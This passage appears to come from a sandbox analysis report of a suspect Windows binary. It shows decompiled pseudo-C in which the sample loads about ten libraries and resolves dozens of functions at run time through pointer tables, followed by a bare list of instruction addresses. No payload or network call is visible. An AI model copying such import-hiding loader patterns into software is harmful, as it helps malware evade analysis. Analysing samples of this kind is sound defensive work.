                                        					 *0x29dd8470 = _t222;
                                        					_t223 =  *0x29dd7af8; // 0x15a2918
                                        					_t224 = GetProcAddress(_t337, _t223);
                                        					_t432 =  *0x29dd7a5c; // 0x15a29d8
                                        					 *0x29dd8364 = _t224;
                                        					_t225 =  *0x29dd856c; // 0x74ab0000
                                        					_t226 = GetProcAddress(_t225, _t432);
                                        					_t338 =  *0x29dd7eb0; // 0x15a4880
                                        					_t433 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd8530 = _t226;
                                        					_t227 = GetProcAddress(_t433, _t338);
                                        					_t339 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd851c = _t227;
                                        					_t228 =  *0x29dd7ea8; // 0x15a48b0
                                        					_t229 = GetProcAddress(_t339, _t228);
                                        					_t434 =  *0x29dd7a60; // 0x15a2938
                                        					 *0x29dd84d8 = _t229;
                                        					_t230 =  *0x29dd856c; // 0x74ab0000
                                        					_t231 = GetProcAddress(_t230, _t434);
                                        					_t340 =  *0x29dd7b60; // 0x15a2af8
                                        					_t435 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd85b4 = _t231;
                                        					_t232 = GetProcAddress(_t435, _t340);
                                        					_t341 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd83a4 = _t232;
                                        					_t233 =  *0x29dd7bbc; // 0x1597128
                                        					_t234 = GetProcAddress(_t341, _t233);
                                        					_t436 =  *0x29dd81a0; // 0x15a2a38
                                        					 *0x29dd84b0 = _t234;
                                        					_t235 =  *0x29dd856c; // 0x74ab0000
                                        					_t236 = GetProcAddress(_t235, _t436);
                                        					_t342 =  *0x29dd80e8; // 0x15a2c38
                                        					_t437 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd83f0 = _t236;
                                        					_t237 = GetProcAddress(_t437, _t342);
                                        					_t343 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd83ac = _t237;
                                        					_t238 =  *0x29dd8200; // 0x15a49e8
                                        					_t239 = GetProcAddress(_t343, _t238);
                                        					_t438 =  *0x29dd82c8; // 0x15a4a00
                                        					 *0x29dd858c = _t239;
                                        					_t240 =  *0x29dd856c; // 0x74ab0000
                                        					_t241 = GetProcAddress(_t240, _t438);
                                        					_t344 =  *0x29dd7ce4; // 0x15a4838
                                        					_t439 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd8380 = _t241;
                                        					 *0x29dd8508 = GetProcAddress(_t439, _t344);
                                        					_t243 =  *0x29dd7e74; // 0x1597240
                                        					_t345 =  *0x29dd856c; // 0x74ab0000
                                        					_t244 = GetProcAddress(_t345, _t243);
                                        					_t440 =  *0x29dd7b64; // 0x15a4958
                                        					 *0x29dd8564 = _t244;
                                        					_t245 =  *0x29dd856c; // 0x74ab0000
                                        					_t246 = GetProcAddress(_t245, _t440);
                                        					_t346 =  *0x29dd7be0; // 0x15a4910
                                        					_t441 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd83d4 = _t246;
                                        					_t247 = GetProcAddress(_t441, _t346);
                                        					_t347 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd84ac = _t247;
                                        					_t248 =  *0x29dd811c; // 0x15a2a78
                                        					_t249 = GetProcAddress(_t347, _t248);
                                        					_t442 =  *0x29dd7e5c; // 0x15a29f8
                                        					 *0x29dd8404 = _t249;
                                        					_t250 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd8354 = GetProcAddress(_t250, _t442);
                                        				}
                                        				_t252 =  *0x29dd7d80; // 0x15a24d8
                                        				_t2 = LoadLibraryA(_t252);
                                        				_t348 =  *0x29dd7c04; // 0x15a24c0
                                        				 *0x29dd8534 = _t2; // executed
                                        				_t3 = LoadLibraryA(_t348); // executed
                                        				 *0x29dd8440 = _t3;
                                        				_t4 =  *0x29dd7d48; // 0x15a2538
                                        				_t5 = LoadLibraryA(_t4);
                                        				_t253 =  *0x29dd7b38; // 0x15a2040
                                        				 *0x29dd83e0 = _t5;
                                        				_t6 = LoadLibraryA(_t253);
                                        				_t349 =  *0x29dd81a8; // 0x15a2028
                                        				 *0x29dd8488 = _t6;
                                        				 *0x29dd847c = LoadLibraryA(_t349);
                                        				_t8 =  *0x29dd7ac0; // 0x15a2568
                                        				_t9 = LoadLibraryA(_t8);
                                        				_t254 =  *0x29dd7c7c; // 0x15a2448
                                        				 *0x29dd85a4 = _t9; // executed
                                        				_t10 = LoadLibraryA(_t254);
                                        				_t350 =  *0x29dd7c5c; // 0x15a4ac0
                                        				 *0x29dd8454 = _t10; // executed
                                        				_t11 = LoadLibraryA(_t350); // executed
                                        				 *0x29dd8598 = _t11;
                                        				_t12 =  *0x29dd8084; // 0x15a4a90
                                        				_t13 = LoadLibraryA(_t12);
                                        				_t255 =  *0x29dd7f68; // 0x15a4928
                                        				 *0x29dd846c = _t13; // executed
                                        				_t14 = LoadLibraryA(_t255);
                                        				_t351 =  *0x29dd7df8; // 0x15a4850
                                        				 *0x29dd8588 = _t14; // executed
                                        				_t15 = LoadLibraryA(_t351); // executed
                                        				 *0x29dd8444 = _t15;
                                        				_t16 =  *0x29dd8534; // 0x75340000
                                        				if(_t16 != 0) {
                                        					_t305 =  *0x29dd7b1c; // 0x1596e80
                                        					_t145 = GetProcAddress(_t16, _t305);
                                        					_t400 =  *0x29dd81fc; // 0x159c8b0
                                        					 *0x29dd8464 = _t145;
                                        					_t146 =  *0x29dd8534; // 0x75340000
                                        					_t147 = GetProcAddress(_t146, _t400);
                                        					_t306 =  *0x29dd7fb4; // 0x1596ea8
                                        					_t401 =  *0x29dd8534; // 0x75340000
                                        					 *0x29dd8518 = _t147;
                                        					_t148 = GetProcAddress(_t401, _t306);
                                        					_t307 =  *0x29dd8534; // 0x75340000
                                        					 *0x29dd8410 = _t148;
                                        					_t149 =  *0x29dd7dc4; // 0x159c670
                                        					_t150 = GetProcAddress(_t307, _t149);
                                        					_t402 =  *0x29dd7fcc; // 0x1596ef8
                                        					 *0x29dd83e8 = _t150;
                                        					_t151 =  *0x29dd8534; // 0x75340000
                                        					_t152 = GetProcAddress(_t151, _t402);
                                        					_t308 =  *0x29dd7ad4; // 0x15a2520
                                        					_t403 =  *0x29dd8534; // 0x75340000
                                        					 *0x29dd83c4 = _t152;
                                        					 *0x29dd8568 = GetProcAddress(_t403, _t308);
                                        				}
                                        				_t17 =  *0x29dd8440; // 0x76120000
                                        				if(_t17 != 0) {
                                        					_t303 =  *0x29dd7db4; // 0x159c7d0
                                        					_t141 = GetProcAddress(_t17, _t303);
                                        					_t398 =  *0x29dd7b50; // 0x15a2a18
                                        					 *0x29dd8428 = _t141;
                                        					_t142 =  *0x29dd8440; // 0x76120000
                                        					_t143 = GetProcAddress(_t142, _t398);
                                        					_t304 =  *0x29dd7ae0; // 0x159c630
                                        					_t399 =  *0x29dd8440; // 0x76120000
                                        					 *0x29dd835c = _t143;
                                        					 *0x29dd84e0 = GetProcAddress(_t399, _t304);
                                        				}
                                        				_t18 =  *0x29dd8358; // 0x76c60000
                                        				if(_t18 != 0) {
                                        					_t293 =  *0x29dd8190; // 0x15a26a0
                                        					_t117 = GetProcAddress(_t18, _t293);
                                        					_t388 =  *0x29dd7fe4; // 0x159c830
                                        					 *0x29dd8448 = _t117;
                                        					_t118 =  *0x29dd8358; // 0x76c60000
                                        					_t119 = GetProcAddress(_t118, _t388);
                                        					_t294 =  *0x29dd7bc0; // 0x15a2508
                                        					_t389 =  *0x29dd8358; // 0x76c60000
                                        					 *0x29dd842c = _t119;
                                        					_t120 = GetProcAddress(_t389, _t294);
                                        					_t295 =  *0x29dd8358; // 0x76c60000
                                        					 *0x29dd84d0 = _t120;
                                        					_t121 =  *0x29dd8234; // 0x15a2580
                                        					_t122 = GetProcAddress(_t295, _t121);
                                        					_t390 =  *0x29dd7da4; // 0x15a2430
                                        					 *0x29dd85ac = _t122;
                                        					_t123 =  *0x29dd8358; // 0x76c60000
                                        					_t124 = GetProcAddress(_t123, _t390);
                                        					_t296 =  *0x29dd7c68; // 0x15a23d0
                                        					_t391 =  *0x29dd8358; // 0x76c60000
                                        					 *0x29dd8368 = _t124;
                                        					_t125 = GetProcAddress(_t391, _t296);
                                        					_t297 =  *0x29dd8358; // 0x76c60000
                                        					 *0x29dd8574 = _t125;
                                        					_t126 =  *0x29dd8094; // 0x15a2460
                                        					_t127 = GetProcAddress(_t297, _t126);
                                        					_t392 =  *0x29dd8064; // 0x159a6f0
                                        					 *0x29dd8408 = _t127;
                                        					_t128 =  *0x29dd8358; // 0x76c60000
                                        					_t129 = GetProcAddress(_t128, _t392);
                                        					_t298 =  *0x29dd8208; // 0x159c950
                                        					_t393 =  *0x29dd8358; // 0x76c60000
                                        					 *0x29dd844c = _t129;
                                        					_t130 = GetProcAddress(_t393, _t298);
                                        					_t299 =  *0x29dd8358; // 0x76c60000
                                        					 *0x29dd8370 = _t130;
                                        					_t131 =  *0x29dd82c4; // 0x15a48c8
                                        					_t132 = GetProcAddress(_t299, _t131);
                                        					_t394 =  *0x29dd7ff4; // 0x15a2ab8
                                        					 *0x29dd85c0 = _t132;
                                        					_t133 =  *0x29dd8358; // 0x76c60000
                                        					_t134 = GetProcAddress(_t133, _t394);
                                        					_t300 =  *0x29dd80dc; // 0x15a2ad8
                                        					_t395 =  *0x29dd8358; // 0x76c60000
                                        					 *0x29dd8570 = _t134;
                                        					_t135 = GetProcAddress(_t395, _t300);
                                        					_t301 =  *0x29dd8358; // 0x76c60000
                                        					 *0x29dd8430 = _t135;
                                        					_t136 =  *0x29dd7e20; // 0x15a4970
                                        					_t137 = GetProcAddress(_t301, _t136);
                                        					_t396 =  *0x29dd7c44; // 0x15a4988
                                        					 *0x29dd849c = _t137;
                                        					_t138 =  *0x29dd8358; // 0x76c60000
                                        					_t139 = GetProcAddress(_t138, _t396);
                                        					_t302 =  *0x29dd81d0; // 0x15a49a0
                                        					_t397 =  *0x29dd8358; // 0x76c60000
                                        					 *0x29dd8548 = _t139;
                                        					 *0x29dd83c0 = GetProcAddress(_t397, _t302);
                                        				}
                                        				_t19 =  *0x29dd83e0; // 0x73070000
                                        				if(_t19 != 0) {
                                        					_t284 =  *0x29dd7cac; // 0x159c6f0
                                        					_t96 = GetProcAddress(_t19, _t284);
                                        					_t380 =  *0x29dd8028; // 0x159c8f0
                                        					 *0x29dd8458 = _t96;
                                        					_t97 =  *0x29dd83e0; // 0x73070000
                                        					_t98 = GetProcAddress(_t97, _t380);
                                        					_t285 =  *0x29dd8014; // 0x159c890
                                        					_t381 =  *0x29dd83e0; // 0x73070000
                                        					 *0x29dd8480 = _t98;
                                        					_t99 = GetProcAddress(_t381, _t285);
                                        					_t286 =  *0x29dd83e0; // 0x73070000
                                        					 *0x29dd853c = _t99;
                                        					_t100 =  *0x29dd7fd8; // 0x159c8d0
                                        					_t101 = GetProcAddress(_t286, _t100);
                                        					_t382 =  *0x29dd7cbc; // 0x159c7b0
                                        					 *0x29dd85bc = _t101;
                                        					_t102 =  *0x29dd83e0; // 0x73070000
                                        					_t103 = GetProcAddress(_t102, _t382);
                                        					_t287 =  *0x29dd7f24; // 0x15a2418
                                        					_t383 =  *0x29dd83e0; // 0x73070000
                                        					 *0x29dd8578 = _t103;
                                        					_t104 = GetProcAddress(_t383, _t287);
                                        					_t288 =  *0x29dd83e0; // 0x73070000
                                        					 *0x29dd845c = _t104;
                                        					_t105 =  *0x29dd81e8; // 0x159c710
                                        					_t106 = GetProcAddress(_t288, _t105);
                                        					_t384 =  *0x29dd7e50; // 0x15a25f8
                                        					 *0x29dd838c = _t106;
                                        					_t107 =  *0x29dd83e0; // 0x73070000
                                        					_t108 = GetProcAddress(_t107, _t384);
                                        					_t289 =  *0x29dd8278; // 0x159c850
                                        					_t385 =  *0x29dd83e0; // 0x73070000
                                        					 *0x29dd85d4 = _t108;
                                        					_t109 = GetProcAddress(_t385, _t289);
                                        					_t290 =  *0x29dd83e0; // 0x73070000
                                        					 *0x29dd84a0 = _t109;
                                        					_t110 =  *0x29dd7cd8; // 0x159c730
                                        					_t111 = GetProcAddress(_t290, _t110);
                                        					_t386 =  *0x29dd7ef4; // 0x159c790
                                        					 *0x29dd8460 = _t111;
                                        					_t112 =  *0x29dd83e0; // 0x73070000
                                        					_t113 = GetProcAddress(_t112, _t386);
                                        					_t291 =  *0x29dd8258; // 0x159c9d0
                                        					_t387 =  *0x29dd83e0; // 0x73070000
                                        					 *0x29dd8350 = _t113;
                                        					_t114 = GetProcAddress(_t387, _t291);
                                        					_t292 =  *0x29dd83e0; // 0x73070000
                                        					 *0x29dd843c = _t114;
                                        					_t115 =  *0x29dd81e4; // 0x15a2d58
                                        					 *0x29dd83fc = GetProcAddress(_t292, _t115);
                                        				}
                                        				_t20 =  *0x29dd8488; // 0x749d0000
                                        				if(_t20 != 0) {
                                        					_t375 =  *0x29dd7cd4; // 0x159c7f0
                                        					_t85 = GetProcAddress(_t20, _t375);
                                        					_t280 =  *0x29dd8488; // 0x749d0000
                                        					 *0x29dd83bc = _t85;
                                        					_t86 =  *0x29dd80f0; // 0x15a24a8
                                        					_t87 = GetProcAddress(_t280, _t86);
                                        					_t376 =  *0x29dd7d20; // 0x15a1a40
                                        					 *0x29dd839c = _t87;
                                        					_t88 =  *0x29dd8488; // 0x749d0000
                                        					_t89 = GetProcAddress(_t88, _t376);
                                        					_t281 =  *0x29dd80b4; // 0x15a23e8
                                        					_t377 =  *0x29dd8488; // 0x749d0000
                                        					 *0x29dd837c = _t89;
                                        					_t90 = GetProcAddress(_t377, _t281);
                                        					_t282 =  *0x29dd8488; // 0x749d0000
                                        					 *0x29dd8538 = _t90;
                                        					_t91 =  *0x29dd7f58; // 0x15a2598
                                        					_t92 = GetProcAddress(_t282, _t91);
                                        					_t378 =  *0x29dd7bec; // 0x15a2610
                                        					 *0x29dd84d4 = _t92;
                                        					_t93 =  *0x29dd8488; // 0x749d0000
                                        					_t94 = GetProcAddress(_t93, _t378);
                                        					_t283 =  *0x29dd8290; // 0x159c870
                                        					_t379 =  *0x29dd8488; // 0x749d0000
                                        					 *0x29dd8468 = _t94;
                                        					 *0x29dd8450 = GetProcAddress(_t379, _t283);
                                        				}
                                        				_t21 =  *0x29dd847c; // 0x763c0000
                                        				if(_t21 != 0) {
                                        					_t277 =  *0x29dd7f60; // 0x159c970
                                        					_t77 = GetProcAddress(_t21, _t277);
                                        					_t372 =  *0x29dd7d74; // 0x15a2640
                                        					 *0x29dd83d8 = _t77;
                                        					_t78 =  *0x29dd847c; // 0x763c0000
                                        					_t79 = GetProcAddress(_t78, _t372);
                                        					_t278 =  *0x29dd8254; // 0x15a47f0
                                        					_t373 =  *0x29dd847c; // 0x763c0000
                                        					 *0x29dd8528 = _t79;
                                        					_t80 = GetProcAddress(_t373, _t278);
                                        					_t279 =  *0x29dd847c; // 0x763c0000
                                        					 *0x29dd8544 = _t80;
                                        					_t81 =  *0x29dd7ba8; // 0x15a2d78
                                        					_t82 = GetProcAddress(_t279, _t81);
                                        					_t374 =  *0x29dd7e58; // 0x15a2fb8
                                        					 *0x29dd848c = _t82;
                                        					_t83 =  *0x29dd847c; // 0x763c0000
                                        					 *0x29dd8388 = GetProcAddress(_t83, _t374);
                                        				}
                                        				_t22 =  *0x29dd85a4; // 0x76220000
                                        				if(_t22 != 0) {
                                        					_t270 =  *0x29dd80e0; // 0x159c990
                                        					_t59 = GetProcAddress(_t22, _t270);
                                        					_t365 =  *0x29dd7e78; // 0x15a25c8
                                        					 *0x29dd8378 = _t59;
                                        					_t60 =  *0x29dd85a4; // 0x76220000
                                        					_t61 = GetProcAddress(_t60, _t365);
                                        					_t271 =  *0x29dd80cc; // 0x15a2a58
                                        					_t366 =  *0x29dd85a4; // 0x76220000
                                        					 *0x29dd8524 = _t61;
                                        					_t62 = GetProcAddress(_t366, _t271);
                                        					_t272 =  *0x29dd85a4; // 0x76220000
                                        					 *0x29dd84f0 = _t62;
                                        					_t63 =  *0x29dd8120; // 0x15a25b0
                                        					_t64 = GetProcAddress(_t272, _t63);
                                        					_t367 =  *0x29dd8118; // 0x15a1a30
                                        					 *0x29dd8384 = _t64;
                                        					_t65 =  *0x29dd85a4; // 0x76220000
                                        					_t66 = GetProcAddress(_t65, _t367);
                                        					_t273 =  *0x29dd7d70; // 0x15a2550
                                        					_t368 =  *0x29dd85a4; // 0x76220000
                                        					 *0x29dd85a0 = _t66;
                                        					_t67 = GetProcAddress(_t368, _t273);
                                        					_t274 =  *0x29dd85a4; // 0x76220000
                                        					 *0x29dd8374 = _t67;
                                        					_t68 =  *0x29dd7fc8; // 0x15a2b18
                                        					_t69 = GetProcAddress(_t274, _t68);
                                        					_t369 =  *0x29dd7cf4; // 0x15a2cb8
                                        					 *0x29dd84fc = _t69;
                                        					_t70 =  *0x29dd85a4; // 0x76220000
                                        					_t71 = GetProcAddress(_t70, _t369);
                                        					_t275 =  *0x29dd7de8; // 0x15a49b8
                                        					_t370 =  *0x29dd85a4; // 0x76220000
                                        					 *0x29dd85b8 = _t71;
                                        					_t72 = GetProcAddress(_t370, _t275);
                                        					_t276 =  *0x29dd85a4; // 0x76220000
                                        					 *0x29dd85c4 = _t72;
                                        					_t73 =  *0x29dd7f88; // 0x15a4868
                                        					_t74 = GetProcAddress(_t276, _t73);
                                        					_t371 =  *0x29dd7df4; // 0x15a4a48
                                        					 *0x29dd8560 = _t74;
                                        					_t75 =  *0x29dd85a4; // 0x76220000
                                        					 *0x29dd8594 = GetProcAddress(_t75, _t371);
                                        				}
                                        				_t23 =  *0x29dd8454; // 0x76b20000
                                        				if(_t23 != 0) {
                                        					_t268 =  *0x29dd7e18; // 0x15a28f8
                                        					_t55 = GetProcAddress(_t23, _t268);
                                        					_t363 =  *0x29dd8024; // 0x15a28d8
                                        					 *0x29dd854c = _t55;
                                        					_t56 =  *0x29dd8454; // 0x76b20000
                                        					_t57 = GetProcAddress(_t56, _t363);
                                        					_t269 =  *0x29dd8100; // 0x15a2bb8
                                        					_t364 =  *0x29dd8454; // 0x76b20000
                                        					 *0x29dd83b0 = _t57;
                                        					 *0x29dd84a4 = GetProcAddress(_t364, _t269);
                                        				}
                                        				_t24 =  *0x29dd8598; // 0x755e0000
                                        				if(_t24 != 0) {
                                        					_t266 =  *0x29dd7ddc; // 0x15a4a60
                                        					_t51 = GetProcAddress(_t24, _t266);
                                        					_t361 =  *0x29dd7ac4; // 0x15a2f18
                                        					 *0x29dd8584 = _t51;
                                        					_t52 =  *0x29dd8598; // 0x755e0000
                                        					_t53 = GetProcAddress(_t52, _t361);
                                        					_t267 =  *0x29dd7ccc; // 0x15a2e38
                                        					_t362 =  *0x29dd8598; // 0x755e0000
                                        					 *0x29dd8478 = _t53;
                                        					 *0x29dd8500 = GetProcAddress(_t362, _t267);
                                        				}
                                        				_t25 =  *0x29dd846c; // 0x75f30000
                                        				if(_t25 != 0) {
                                        					_t262 =  *0x29dd7db8; // 0x15a4a78
                                        					_t42 = GetProcAddress(_t25, _t262);
                                        					_t357 =  *0x29dd7b04; // 0x15a4aa8
                                        					 *0x29dd85e4 = _t42;
                                        					_t43 =  *0x29dd846c; // 0x75f30000
                                        					_t44 = GetProcAddress(_t43, _t357);
                                        					_t263 =  *0x29dd7bb8; // 0x15a4ad8
                                        					_t358 =  *0x29dd846c; // 0x75f30000
                                        					 *0x29dd841c = _t44;
                                        					_t45 = GetProcAddress(_t358, _t263);
                                        					_t264 =  *0x29dd846c; // 0x75f30000
                                        					 *0x29dd8550 = _t45;
                                        					_t46 =  *0x29dd7cb0; // 0x15a4be0
                                        					_t47 = GetProcAddress(_t264, _t46);
                                        					_t359 =  *0x29dd816c; // 0x15a18c0
                                        					 *0x29dd84e4 = _t47;
                                        					_t48 =  *0x29dd846c; // 0x75f30000
                                        					_t49 = GetProcAddress(_t48, _t359);
                                        					_t265 =  *0x29dd8054; // 0x15a2df8
                                        					_t360 =  *0x29dd846c; // 0x75f30000
                                        					 *0x29dd83a0 = _t49;
                                        					 *0x29dd83dc = GetProcAddress(_t360, _t265);
                                        				}
                                        				_t26 =  *0x29dd8588; // 0x73990000
                                        				if(_t26 != 0) {
                                        					_t261 =  *0x29dd7edc; // 0x15a4c88
                                        					 *0x29dd8490 = GetProcAddress(_t26, _t261);
                                        				}
                                        				_t27 =  *0x29dd8444; // 0x734d0000
                                        				if(_t27 != 0) {
                                        					_t352 =  *0x29dd7e40; // 0x15970b0
                                        					_t28 = GetProcAddress(_t27, _t352);
                                        					_t256 =  *0x29dd8444; // 0x734d0000
                                        					 *0x29dd83e4 = _t28;
                                        					_t29 =  *0x29dd7cf8; // 0x15a2dd8
                                        					_t30 = GetProcAddress(_t256, _t29);
                                        					_t353 =  *0x29dd7d60; // 0x1597290
                                        					 *0x29dd8434 = _t30;
                                        					_t31 =  *0x29dd8444; // 0x734d0000
                                        					_t32 = GetProcAddress(_t31, _t353);
                                        					_t257 =  *0x29dd7b78; // 0x15a4af0
                                        					_t354 =  *0x29dd8444; // 0x734d0000
                                        					 *0x29dd84ec = _t32;
                                        					_t33 = GetProcAddress(_t354, _t257);
                                        					_t258 =  *0x29dd8444; // 0x734d0000
                                        					 *0x29dd852c = _t33;
                                        					_t34 =  *0x29dd7f90; // 0x15a4bf8
                                        					_t35 = GetProcAddress(_t258, _t34);
                                        					_t355 =  *0x29dd82b0; // 0x15a2f78
                                        					 *0x29dd850c = _t35;
                                        					_t36 =  *0x29dd8444; // 0x734d0000
                                        					_t37 = GetProcAddress(_t36, _t355);
                                        					_t259 =  *0x29dd7de4; // 0x15a2e58
                                        					_t356 =  *0x29dd8444; // 0x734d0000
                                        					 *0x29dd84c0 = _t37;
                                        					_t38 = GetProcAddress(_t356, _t259);
                                        					_t260 =  *0x29dd8444; // 0x734d0000
                                        					 *0x29dd8400 = _t38;
                                        					_t39 =  *0x29dd82a4; // 0x15a4b50
                                        					_t40 = GetProcAddress(_t260, _t39);
                                        					 *0x29dd8580 = _t40;
                                        					return _t40;
                                        				}
                                        				return _t27;
                                        			}
                                        0x29da8678
                                        0x29da867f
                                        0x29da8685
                                        0x29da868b
                                        0x29da8690
                                        0x29da8697
                                        0x29da869d
                                        0x29da86a3
                                        0x29da86ab
                                        0x29da86b0
                                        0x29da86b6
                                        0x29da86bc
                                        0x29da86c1
                                        0x29da86c8
                                        0x29da86ce
                                        0x29da86d4
                                        0x29da86d9
                                        0x29da86e0
                                        0x29da86e6
                                        0x29da86ec
                                        0x29da86f4
                                        0x29da86f9
                                        0x29da86ff
                                        0x29da8705
                                        0x29da870a
                                        0x29da8711
                                        0x29da8717
                                        0x29da871d
                                        0x29da8722
                                        0x29da8729
                                        0x29da872f
                                        0x29da8735
                                        0x29da873d
                                        0x29da8742
                                        0x29da8748
                                        0x29da874e
                                        0x29da8753
                                        0x29da875a
                                        0x29da8760
                                        0x29da8766
                                        0x29da876b
                                        0x29da8772
                                        0x29da8778
                                        0x29da877e
                                        0x29da8786
                                        0x29da878b
                                        0x29da8791
                                        0x29da8797
                                        0x29da879c
                                        0x29da87a3
                                        0x29da87a9
                                        0x29da87af
                                        0x29da87b4
                                        0x29da87bb
                                        0x29da87c1
                                        0x29da87c7
                                        0x29da87cf
                                        0x29da87d4
                                        0x29da87da
                                        0x29da87e0
                                        0x29da87e5
                                        0x29da87ec
                                        0x29da87f2
                                        0x29da87f8
                                        0x29da87fd
                                        0x29da8804
                                        0x29da880a
                                        0x29da8810
                                        0x29da8818
                                        0x29da881d
                                        0x29da8823
                                        0x29da8829
                                        0x29da882e
                                        0x29da8835
                                        0x29da883b
                                        0x29da8841
                                        0x29da8846
                                        0x29da884d
                                        0x29da8853
                                        0x29da8859
                                        0x29da8861
                                        0x29da8866
                                        0x29da886c
                                        0x29da8872
                                        0x29da8877
                                        0x29da887e
                                        0x29da8884
                                        0x29da888a
                                        0x29da888f
                                        0x29da8896
                                        0x29da889c
                                        0x29da88a2
                                        0x29da88aa
                                        0x29da88b5
                                        0x29da88ba
                                        0x29da88bf
                                        0x29da88c7
                                        0x29da88cd
                                        0x29da88d3
                                        0x29da88d8
                                        0x29da88df
                                        0x29da88e5
                                        0x29da88eb
                                        0x29da88f3
                                        0x29da88f8
                                        0x29da88fe
                                        0x29da8904
                                        0x29da8909
                                        0x29da8910
                                        0x29da8916
                                        0x29da891c
                                        0x29da8921
                                        0x29da892e
                                        0x29da892e
                                        0x29da8933
                                        0x29da893a
                                        0x29da8940
                                        0x29da8947
                                        0x29da894c
                                        0x29da8952
                                        0x29da8957
                                        0x29da895d
                                        0x29da8963
                                        0x29da896a
                                        0x29da896f
                                        0x29da8975
                                        0x29da897c
                                        0x29da8987
                                        0x29da898c
                                        0x29da8992
                                        0x29da8998
                                        0x29da899f
                                        0x29da89a4
                                        0x29da89aa
                                        0x29da89b1
                                        0x29da89b6
                                        0x29da89bc
                                        0x29da89c1
                                        0x29da89c7
                                        0x29da89cd
                                        0x29da89d4
                                        0x29da89d9
                                        0x29da89df
                                        0x29da89e6
                                        0x29da89eb
                                        0x29da89f1
                                        0x29da89f6
                                        0x29da89fd
                                        0x29da8a03
                                        0x29da8a0b
                                        0x29da8a11
                                        0x29da8a17
                                        0x29da8a1c
                                        0x29da8a23
                                        0x29da8a29
                                        0x29da8a2f
                                        0x29da8a37
                                        0x29da8a3c
                                        0x29da8a42
                                        0x29da8a48
                                        0x29da8a4d
                                        0x29da8a54
                                        0x29da8a5a
                                        0x29da8a60
                                        0x29da8a65
                                        0x29da8a6c
                                        0x29da8a72
                                        0x29da8a78
                                        0x29da8a80
                                        0x29da8a8b
                                        0x29da8a8b
                                        0x29da8a90
                                        0x29da8a97
                                        0x29da8a99
                                        0x29da8aa1
                                        0x29da8aa7
                                        0x29da8aad
                                        0x29da8ab2
                                        0x29da8ab9
                                        0x29da8abf
                                        0x29da8ac5
                                        0x29da8acd
                                        0x29da8ad8
                                        0x29da8ad8
                                        0x29da8add
                                        0x29da8ae4
                                        0x29da8aea
                                        0x29da8af2
                                        0x29da8af8
                                        0x29da8afe
                                        0x29da8b03
                                        0x29da8b0a
                                        0x29da8b10
                                        0x29da8b16
                                        0x29da8b1e
                                        0x29da8b23
                                        0x29da8b29
                                        0x29da8b2f
                                        0x29da8b34
                                        0x29da8b3b
                                        0x29da8b41
                                        0x29da8b47
                                        0x29da8b4c
                                        0x29da8b53
                                        0x29da8b59
                                        0x29da8b5f
                                        0x29da8b67
                                        0x29da8b6c
                                        0x29da8b72
                                        0x29da8b78
                                        0x29da8b7d
                                        0x29da8b84
                                        0x29da8b8a
                                        0x29da8b90
                                        0x29da8b95
                                        0x29da8b9c
                                        0x29da8ba2
                                        0x29da8ba8
                                        0x29da8bb0
                                        0x29da8bb5
                                        0x29da8bbb
                                        0x29da8bc1
                                        0x29da8bc6
                                        0x29da8bcd
                                        0x29da8bd3
                                        0x29da8bd9
                                        0x29da8bde
                                        0x29da8be5
                                        0x29da8beb
                                        0x29da8bf1
                                        0x29da8bf9
                                        0x29da8bfe
                                        0x29da8c04
                                        0x29da8c0a
                                        0x29da8c0f
                                        0x29da8c16
                                        0x29da8c1c
                                        0x29da8c22
                                        0x29da8c27
                                        0x29da8c2e
                                        0x29da8c34
                                        0x29da8c3a
                                        0x29da8c42
                                        0x29da8c4d
                                        0x29da8c4d
                                        0x29da8c52
                                        0x29da8c59
                                        0x29da8c5f
                                        0x29da8c67
                                        0x29da8c6d
                                        0x29da8c73
                                        0x29da8c78
                                        0x29da8c7f
                                        0x29da8c85
                                        0x29da8c8b
                                        0x29da8c93
                                        0x29da8c98
                                        0x29da8c9e
                                        0x29da8ca4
                                        0x29da8ca9
                                        0x29da8cb0
                                        0x29da8cb6
                                        0x29da8cbc
                                        0x29da8cc1
                                        0x29da8cc8
                                        0x29da8cce
                                        0x29da8cd4
                                        0x29da8cdc
                                        0x29da8ce1
                                        0x29da8ce7
                                        0x29da8ced
                                        0x29da8cf2
                                        0x29da8cf9
                                        0x29da8cff
                                        0x29da8d05
                                        0x29da8d0a
                                        0x29da8d11
                                        0x29da8d17
                                        0x29da8d1d
                                        0x29da8d25
                                        0x29da8d2a
                                        0x29da8d30
                                        0x29da8d36
                                        0x29da8d3b
                                        0x29da8d42
                                        0x29da8d48
                                        0x29da8d4e
                                        0x29da8d53
                                        0x29da8d5a
                                        0x29da8d60
                                        0x29da8d66
                                        0x29da8d6e
                                        0x29da8d73
                                        0x29da8d79
                                        0x29da8d7f
                                        0x29da8d84
                                        0x29da8d91
                                        0x29da8d91
                                        0x29da8d96
                                        0x29da8d9d
                                        0x29da8da3
                                        0x29da8dab
                                        0x29da8db1
                                        0x29da8db7
                                        0x29da8dbc
                                        0x29da8dc3
                                        0x29da8dc9
                                        0x29da8dcf
                                        0x29da8dd4
                                        0x29da8ddb
                                        0x29da8de1
                                        0x29da8de7
                                        0x29da8def
                                        0x29da8df4
                                        0x29da8dfa
                                        0x29da8e00
                                        0x29da8e05
                                        0x29da8e0c
                                        0x29da8e12
                                        0x29da8e18
                                        0x29da8e1d
                                        0x29da8e24
                                        0x29da8e2a
                                        0x29da8e30
                                        0x29da8e38
                                        0x29da8e43
                                        0x29da8e43
                                        0x29da8e48
                                        0x29da8e4f
                                        0x29da8e51
                                        0x29da8e59
                                        0x29da8e5f
                                        0x29da8e65
                                        0x29da8e6a
                                        0x29da8e71
                                        0x29da8e77
                                        0x29da8e7d
                                        0x29da8e85
                                        0x29da8e8a
                                        0x29da8e90
                                        0x29da8e96
                                        0x29da8e9b
                                        0x29da8ea2
                                        0x29da8ea8
                                        0x29da8eae
                                        0x29da8eb3
                                        0x29da8ec0
                                        0x29da8ec0
                                        0x29da8ec5
                                        0x29da8ecc
                                        0x29da8ed2
                                        0x29da8eda
                                        0x29da8ee0
                                        0x29da8ee6
